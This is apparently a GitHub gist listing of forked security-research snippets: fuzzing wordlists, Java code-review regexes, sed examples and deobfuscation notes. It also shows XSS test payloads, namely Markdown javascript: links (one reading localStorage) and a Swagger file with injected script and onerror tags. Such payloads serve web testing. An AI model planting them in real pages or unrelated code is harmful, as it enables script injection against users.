mrrootsec / List of API endpoints & objects

Created August 20, 2025 03:39 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

mrrootsec / gist:3c99eecd740983774738950c74ada109

Created July 24, 2025 11:20 — forked from tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc

Markdown XSS Payloads

	Links:

	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')

	Images:

mrrootsec / README.md

Created June 29, 2025 11:42 — forked from win3zz/README.md

Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

These patterns look for sensitive information directly embedded in the code.

mrrootsec / mutation_a.txt

Created June 24, 2025 15:24 — forked from hackerscrolls/mutation_a.txt

Mutation points in <a> tag for WAF bypass

mrrootsec / href_bypass.html

Created April 10, 2025 06:15 — forked from hackerscrolls/href_bypass.html

XSS payloads for href

mrrootsec / getRawPageContent

Last active July 24, 2025 07:35 — forked from henningpohl/getRawPageContent

Bookmarklet to crawl a page for iframes, embeds and links and render those as easy to access list.

	(function(){
	// http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/
	// http://subsimple.com/bookmarklets/jsbuilder.htm

	if(window.jQuery === undefined) {
	var script = document.createElement("script");
	script.src = "https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js";
	script.onload = script.onreadystatechange = function() {
	bookmarklet();
	};

mrrootsec / python-venv-tutorial.md

Created November 14, 2024 05:33 — forked from ryumada/python-venv-tutorial.md

Python Virtual Environment Tutorial

mrrootsec / ponelat-evil-xss.swagger.json

Created September 18, 2024 15:50 — forked from shockey/ponelat-evil-xss.swagger.json

	{
	"swagger" : "2.0",
	"info" : {
	"version" : "1.0.100",
	"title" : "title<script language=\"javascript\">alert('1')</script>",
	"description" : "description with markdown format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
	},
	"tags" : [ {
	"name" : "Admin",
	"description" : "tag with markdown"

mrrootsec / sed_snippets.sh

Created July 29, 2024 14:41 — forked from r2k0/sed_snippets.sh

sed examples

	##FILE SPACING:

	# double space a file
	sed G

	# double space a file which already has blank lines in it. Output file
	# should contain no more than one blank line between lines of text.
	sed '/^$/d;G'

	# triple space a file

mrrootsec / _deobfuscating-unminifying-obfuscated-web-app-code.md

Created April 12, 2024 02:56 — forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md

Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code

Deobfuscating / Unminifying Obfuscated Web App Code